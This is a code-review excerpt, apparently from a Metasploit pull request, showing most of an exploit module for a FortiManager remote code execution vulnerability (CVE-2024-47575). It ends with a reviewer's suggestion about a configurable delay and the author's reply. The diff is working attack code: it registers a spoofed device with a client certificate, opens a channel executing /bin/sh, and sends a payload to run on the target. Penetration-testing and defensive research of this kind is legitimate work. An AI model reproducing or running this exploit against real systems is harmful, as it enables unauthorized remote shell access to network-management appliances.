modules/exploits/linux/misc/fortimanager_rce_cve_2024_47575.rb

```diff
@@ -0,0 +1,321 @@
+    # number identifier.
+    return CheckCode::Detected if organization == 'Fortinet' && common_name&.start_with?('FMG')
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    client_cert_raw = datastore['ClientCert'] ? File.read(datastore['ClientCert']) : get_client_cert
+
+    client_cert = OpenSSL::X509::Certificate.new(client_cert_raw)
+
+    common_name = get_cert_subject_item(client_cert, 'CN')
+
+    fail_with(Failure::BadConfig, 'No common name in client certificate subject') unless common_name
+
+    print_status("Client certificate common name: #{common_name}")
+
+    serial_number = 'FMG-VM0000000000'
+    platform = 'FortiManager-VM64'
+
+    # The platform needs to be the expected type of the corresponding serial number. We try to match these up here,
+    # and we allow for the automatic detection to be overridden by the ClientSerialNumber and ClientPlatform options
+    # in case it is needed.
+    if common_name.start_with? 'FMG'
+      serial_number = common_name
+      platform = 'FortiManager-VM64'
+    elsif common_name.start_with? 'FG'
+      serial_number = common_name
+      platform = 'FortiGate-VM64'
+    else
+      print_warning('Client certificate does not include a serial number in the common name. The target must be configured to accept a certificate like this.')
+    end
+
+    serial_number = datastore['ClientSerialNumber'] if datastore['ClientSerialNumber']
+
+    platform = datastore['ClientPlatform'] if datastore['ClientPlatform']
+
+    print_status("Using client serial number '#{serial_number}' and platform '#{platform}'.")
+
+    print_status('Connecting...')
+
+    s = make_socket
+
+    fail_with(Failure::UnexpectedReply, 'Connection failed.') unless s
+
+    print_status('Registering device...')
+
+    req1 = "get auth\r\nserialno=#{serial_number}\r\nplatform=#{platform}\r\nhostname=localhost\r\n\r\n\x00"
+
+    resp1 = send_packet(s, req1)
+
+    unless resp1&.include?('reply 200')
+      fail_with(Failure::UnexpectedReply, 'Request 1 failed: No reply 200.')
+    end
+
+    print_status('Creating channel...')
+
+    req2 = "get connect_tcp\r\ntcp_port=rsh\r\nchan_window_sz=#{32 * 1024}\r\nterminal=1\r\ncmd=/bin/sh\r\nlocalid=0\r\n\r\n\x00"
+
+    resp2 = send_packet(s, req2)
+
+    unless resp2&.include?('action=ack')
+      fail_with(Failure::UnexpectedReply, 'Request 2 failed: No ack.')
+    end
+
+    localid = resp2.match(/localid=(\d+)/)
+    unless localid
+      fail_with(Failure::UnexpectedReply, 'Request 2 failed: No localid found.')
+    end
+
+    print_status('Triggering...')
+
+    req3 = "channel\r\nremoteid=#{localid[1]}\r\n\r\n\x00" + payload.encoded.length.to_s + "\n" + payload.encoded + "0\n"
+
+    send_packet(s, req3, read: false)
+
+    # A short delay, as we send our payload over the chanel, we want to keep this channel open long enough for the
+    # server-side to process it and execute the payload, before we tear down the socket.
+    Rex::ThreadSafe.sleep(1)
```

Comment:
Potentially make this configurable:
```suggestion
    Rex::ThreadSafe.sleep(datastore['TIMEOUT'])
```

Or leave the socket opened and register it for cleanup, which would wait for `WfsDelay` seconds.

Reply:
I implemented this via commit [68e9b39](https://github.com/rapid7/metasploit-framework/pull/19648/commits/68e9b39ffa6e07910b5f93f985936d90ce80ab5e) and it works great!